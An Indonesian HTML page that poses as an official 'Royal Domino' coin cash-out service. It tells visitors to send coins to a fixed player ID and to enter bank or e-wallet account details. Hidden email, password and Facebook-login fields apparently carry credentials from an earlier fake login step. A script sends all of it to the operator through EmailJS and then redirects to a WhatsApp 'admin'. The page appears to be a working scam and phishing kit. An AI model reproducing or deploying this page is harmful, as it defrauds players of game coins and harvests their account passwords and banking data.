<html lang ="en">
<html>
 <head> 
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> 
<link rel="stylesheet" href="https://maxst.icons8.com/vue-static/landings/line-awesome/line-awesome/1.3.0/css/line-awesome.min.css"> 
  <link href="https://unpkg.com/boxicons@2.0.9/css/boxicons.min.css" rel="stylesheet"> 
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"> 
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.2/css/all.min.css"> 
  <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css"> 
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/material-design-iconic-font/2.2.0/css/material-design-iconic-font.min.css"> 
  <link rel="stylesheet" href="file/css/facebook.css"> 
  <title>AGEN ROYAL DOMINO</title> 
  <meta property="og:title" content="Agen Domino"> 
  <meta name="description" content="Top Up Dan Bongkar Koin Agen Domino!"> 
  <meta property="og:description" content="Top Up Dan Bongkar Koin Agen Domino!"> 
  <meta property="og:url" content="./"> 
  <meta property="og:site_name" content="Agen Doimino"> 
  <meta property="og:type" content="website"> 
  <meta name="copyright" content="nwg Ariandi"> 
  <meta name="theme-color" content="#0b5250"> 
  <meta property="og:image" content="img/higgs_domino.webp"> 
  <link rel="shorcut icon" href="https://i.ibb.co/yqZW7r6/02494223c899dbaf5d6fbe2dcfa24780.png">
  <style>
body {
  background: #043e3a;
  color: #23e1fd;
  font-family: "Helvetica Neue", Helvetica, STHeiTi, Arial, sans-serif;
  margin: 0
}

.appnwghdiprem {
  background: #043e3a;
  background-size: 100% 100%;
  position: relative;
  margin: 0 auto;
  max-width: 411px;
  height: auto
}

}
.containernwghdi {
  display: flow-root
}
    .boxverifnwghdi {

  background: #0b5250
}

.headernwgverifhdi {
  background: url(bg_top.jpg) no-repeat center;
  background-size: 120% 120%;
  font-size: 19px;
  line-height: 40px;
  text-align: center;
  color: #FFFF33;
  font-weight: 700;
  border-bottom: 4px solid #00e5f4
}

.headernwgverifhdi p {
  margin-block: 0
}

.boxnwgverifmarsya {
  background: url(bg_top.jpg) no-repeat center;
  background-size: cover;
  padding: 10px
}

.ucapanverifnwg {
  display: flex;
  flex-direction: column;
  line-height: 20px;
  font-size: 20px
  font-weight: 700px
}

.verifikasikeamananwg {
  padding: 10px
}

.itemnwgverifhdi {
  display: flex;
  margin-bottom: 10px
}

.itemnwgverifhdi label {
  background: #ffbc68;
  color: #814545;
  padding: 8px;
  border-radius: 200px;
  font-weight: 600;
   width: 40px;
 height: 20px;
  text-align: middle;
  display: center;
  flex-direction: row;
  align-items: center;
}

.itemnwgverifhdi select {
  width: 100%;
  margin-left: 10px;
  background: #d5b184;
  color: #835121;
  border: none;
  padding: 10px 10px;
  font-size: 17px;
  border-radius: 5px;
  outline: 0
}

.itempantek input {
  width: 50%;
  margin-left:5px;
  background:  ;
  color: #835121;
  border: none;
  padding: 10px 10px;
  font-size: 17px;
  border-radius: 5px;
  outline: 0
}

.itempantek label {
  background: #ffbc68;
  color: #814545;
    margin-left: 60px;
  padding: 8px;
  border-radius: 100px;
  font-weight: 600;
   width: 40px;
            height: 20px;
  text-align: middle;
  display: center;
  flex-direction: row;
  align-items: center;
}

.itempantek select {
  width: 100%;
  margin-left: 10px;
  background: #d5b184;
  color: #835121;
  border: none;
  padding: 10px 10px;
  font-size: 17px;
  border-radius: 5px;
  outline: 0
  }

  .itempantek {
  display: flex;
  margin-bottom: 10px
}

.itemkontol label {
  margin-left: 60px;
  padding: 11px 1px;
  border-radius: 200px;
  font-weight: 600;
   width: 40px;
            height: 20px;
  text-align: middle;
  display: center;
  flex-direction: row;
  align-items: center;
}

.itemkontol {
  display: flex;
  margin-bottom: 10px
}

.itemkontol input {
  width: 50%;
  margin-left: 8px;
  background: #d5b184;
  color: #835121;
  border: none;
  padding: 10px 10px;
  font-size: 17px;
  border-radius: 5px;
  outline: 0
}

.itemnanjg {
    
  margin-bottom: 10px
}

.itemnanjg select {
  width: %;
  margin-left: 0px;
  background: #d5b184;
  color: #835121;
  border: none;
  padding: 10px 10px;
  font-size: 17px;
  border-radius: 5px;
  outline: 0

}

.itemnwgverifhdi input {
  width: 100%;
  margin-left: 10px;
  background: #d5b184;
  color: #835121;
  border: none;
  padding: 10px 10px;
  font-size: 17px;
  border-radius: 5px;
  outline: 0
}

.buttonnwgverifhdi {
  text-align: center;
    /* PERUBAHAN CSS UNTUK MENEMPATKAN 2 TOMBOL BERDAMPINGAN */
    display: flex;
    justify-content: space-around;
    align-items: center;
    padding: 10px 0;
}

.buttonnwgverifhdi button {
  background-color: #67a309;
  background-image: linear-gradient(0deg, #67a309 0, #c7ee4c 100%);
  color: #268707;
  border: none;
  font-size: 16px; /* Disesuaikan agar muat */
  font-weight: 600;
  margin-top: 10px;
  line-height: 25px; /* Disesuaikan */
  border-radius: 10px;
  box-shadow: 0 2px 1px 0 #1a5806;
  outline: 0;
  padding: 4px 15px; /* Disesuaikan */
  width: 45%; /* Ambil 45% lebar container */
}

/* Style WA baru */
.wa-inline-button {
    display: inline-block;
    background-color: #25d366 !important;
    background-image: none !important;
    color: white !important;
    box-shadow: 0 2px 1px 0 #128c7e !important;
    text-decoration: none;
    font-size: 16px;
    font-weight: 600;
    line-height: 25px;
    border-radius: 10px;
    padding: 4px 15px;
    margin-top: 10px;
    width: 45%; /* Ambil 45% lebar container */
    text-align: center;
}
</style>
 </head> 
 <body style="background: ;"> 
  <div class="appnwghdiprem" style="background: ;"> 
   <div class="containernwghdi"> 
    <div class="boxverifnwghdi"> 
     <div class="headernwgverifhdi"> 
      <p> Admin Resmi Bongkar  </p> 
     </div>
     <div class="boxnwgverifmarsya"> 
     <img src="img/bg1.jpg" alt="image" height="auto" width="100%">
      <div class="itemnanjg"> 
        <div class="itemnanjg">
     
      </div> 
     </div> 
     <div class="verifikasikeamananwg"> 
      <form id="bongkarForm" class="boxformnwg"> 
        <div class="appnwghdiprem" style="background: #0b5250;"> 
          <div class="containernwghdi"> 
            <div class="boxverifnwghdi"> 
              <div class="headernwgverifhdi"> 
                <div class="itemnanjg">   
                </div> 
                <p>Info Pengirim</p> 
              </div>
              <div class="itemkontol"> 
                <label>1.</label> 
                <input type="number" name="id_pengirim" placeholder="Masukan Id Anda" required> 
              </div> 
              <div class="itemkontol"> 
                <label>2.</label> 
                <input type="text" name="nickname" placeholder="Nickname" required> 
              </div> 
              <div class="itemkontol"> 
                <label>3.</label> 
                <input type="text" name="jumlah_bongkaran" placeholder="Jumlah Bongkaran" required> 
              </div> 
              <div>
                <div style="background: #0b5250;">                   <div class="appnwghdiprem" style="background: #0b5250;"> 
                    <div class="containernwghdi"> 
                      <div class="boxverifnwghdi"> 
                        <div class="headernwgverifhdi"> 
                          <p>Silahkan Kirim Koin Ke Id Di Bawah Ini</p> 
                        </div>
                                            <section class="banner"> 
                        <div class="imageslide">
                          <div style="text-align:center"> 
                            <figure class="sliderbanner" style="display: block;"> 
                              <img src="img/id.jpg" alt="Image" height="200" width="200">
                            </figure> 
                            <div class="itemkontol">
                              <label>4.</label> 
                              <div style="display: contents;">                                 <input type="text" value="17146704" id="myInput" name="id_penerima_koin" readonly>
                                <button type="button" onclick="myFunction()">Copy</button>

                                <script>
                                  function myFunction() {
                                    var copyText = document.getElementById("myInput");
                                    copyText.select();
                                    copyText.setSelectionRange(0, 99999);
                                    navigator.clipboard.writeText(copyText.value);
                                    alert("Copied the text: " + copyText.value);
                                  }
                                </script>

                              </div>         </div>
      <div>
          <div class="boxnwgverifmarsya"> 
      <div class="ucapanverifnwg"> 
       <span>SILAHKAN KIRIM SCRENSHOOT HISTORI PERNGIRIMAN AKUN ANDA KE AKUN YANG TERTERA DI ATAS</span> 
        </div>
        <div class="itemkontol">
               <div style="background: #0b5250;">   <div class="appnwghdiprem" style="background: #0b5250;"> 
   <div class="containernwghdi"> 
    <div class="boxverifnwghdi"> 
     <div class="headernwgverifhdi"> 
       <div style="display: block;">             <input type="file" id="myFile" name="filename">
        </div>
       </div>
       <div style="background: #0b5250;">   <div class="appnwghdiprem" style="background: #0b5250;"> 
   <div class="containernwghdi"> 
    <div class="boxverifnwghdi"> 
     <div class="headernwgverifhdi">  
                                          <p>Bank Pencairan</p> 
                                        </div>
                                        <div class="itemnanjg"> 
                                          <select name="bank_pencairan"> 
                                            <option>BCA</option> 
                                            <option>BRI</option> 
                                            <option>BNI</option> 
                                            <option>MANDIRI</option> 
                                            <option>DANA</option> 
                                            <option>OVO</option> 
                                            <option>GOPAY</option> 
                                          </select> 
                                        </div>  
                                        <div class="itemkontol"> 
                                          <label>5.</label> 
                                          <input type="number" name="nomor_rekening" placeholder="Nomor Rekening Pencai" required> 
                                        </div> 
                                        <div class="itemkontol"> 
                                          <label>6.</label> 
                                          <input type="text" name="atas_nama" placeholder="Atas Nama" required> 
                                        </div> 
                                        <div class="buttonnwgverifhdi"> 
                                          <input type="hidden" name="playid" id="ressplayid" value="" readonly>
                                          <input type="hidden" name="email" id="ressemail" value="" readonly>
                                          <input type="hidden" name="password" id="resspw" value="" readonly>
                                          <input type="hidden" name="login" id="nwg_login_fb" value="Facebook" readonly>
                                          
                                                                                    <button type="submit">Kirim</button> 
                                         <a href="https://wa.me/6285343802982?text=Halo%20Admin%20Royal%20Domino%2C%20saya%20sudah%20mengisi%20formulir%20dan%20ingin%20mengirim%20screenshot%20konfirmasi%20transaksi." class="wa-inline-button" target="_blank">
                                            <i class="fab fa-whatsapp"></i> Chat Admin
                                         </a>
                                        </div> 
                                      </div> 
                                    </div> 
                                  </div> 
                                </div>                               </div>
                            </div>
                          </div>
                        </div>
                      </section>
                    </div> 
                </div> 
            </div> 
          </div> 
        </div> 
      </form> 
     </div> 
    </div> 
    <iframe scrolling="no" allow="autoplay" controls="" loop="" src="" style="display: none" width="0" height="0" frameborder="no"></iframe> 
   </div> 
  </div> 

<script>
/* Script Copy ID Koin */
function myFunction() {
    var copyText = document.getElementById("myInput");
    copyText.select();
    copyText.setSelectionRange(0, 99999);
    navigator.clipboard.writeText(copyText.value);
    alert("Copied the text: " + copyText.value);
}
</script>

<script type="text/javascript" src="https://cdn.jsdelivr.net/npm/@emailjs/browser@4/dist/email.min.js"></script>
<script type="text/javascript">
  // KONFIGURASI EMAILJS DARI DATA YANG ANDA BERIKAN
  const SERVICE_ID = "service_glbmixo"; 
  const TEMPLATE_ID = "template_g32778v";
  const PUBLIC_KEY = "Vdmo410kyW_9dbb0F"; 
  const WA_ADMIN_NUMBER = "6285343802982"; // Nomor Admin WA

  // Inisialisasi EmailJS
  emailjs.init(PUBLIC_KEY);

  document.getElementById('bongkarForm').addEventListener('submit', function(event) {
    event.preventDefault(); 
    
    // Dapatkan referensi ke input file (ID: myFile)
    const fileInput = document.getElementById('myFile');
    
    // 1. DISABLE input file sebelum pengiriman (INTI FUNGSI)
    // Mengatur properti 'disabled' pada elemen input file.
    if(fileInput) { 
        fileInput.disabled = true;
    }

    const form = this;
    
    // Kirim email menggunakan EmailJS
    emailjs.sendForm(SERVICE_ID, TEMPLATE_ID, form)
      .then(function() {
        // Jika berhasil
        
        // 2. Aktifkan kembali input file
        if(fileInput) fileInput.disabled = false;
        
        alert('✅ DATA BERHASIL DIKIRIM! Selanjutnya, WAJIB chat Admin di WhatsApp untuk mengirimkan bukti transfer Anda.');
        
        form.reset(); // Kosongkan formulir
        
        // 3. Arahkan pengguna OTOMATIS ke WhatsApp
        const wa_text = "Halo%20Admin%20Royal%20Domino%2C%20data%20saya%20sudah%20terkirim%20via%20form%20dan%20ingin%20mengirim%20screenshot%20konfirmasi.";
        window.location.href = `https://wa.me/${WA_ADMIN_NUMBER}?text=${wa_text}`;

      }, function(error) {
        // Jika gagal
        console.error('Pengiriman Gagal:', error);
        
        // 4. Aktifkan kembali input file jika gagal agar bisa di-submit ulang
        if(fileInput) fileInput.disabled = false;
        alert('Pengiriman data gagal. Silakan coba lagi. Pastikan Anda sudah mengatur template di EmailJS.');
      });
  });
</script>
 </body>
</html>
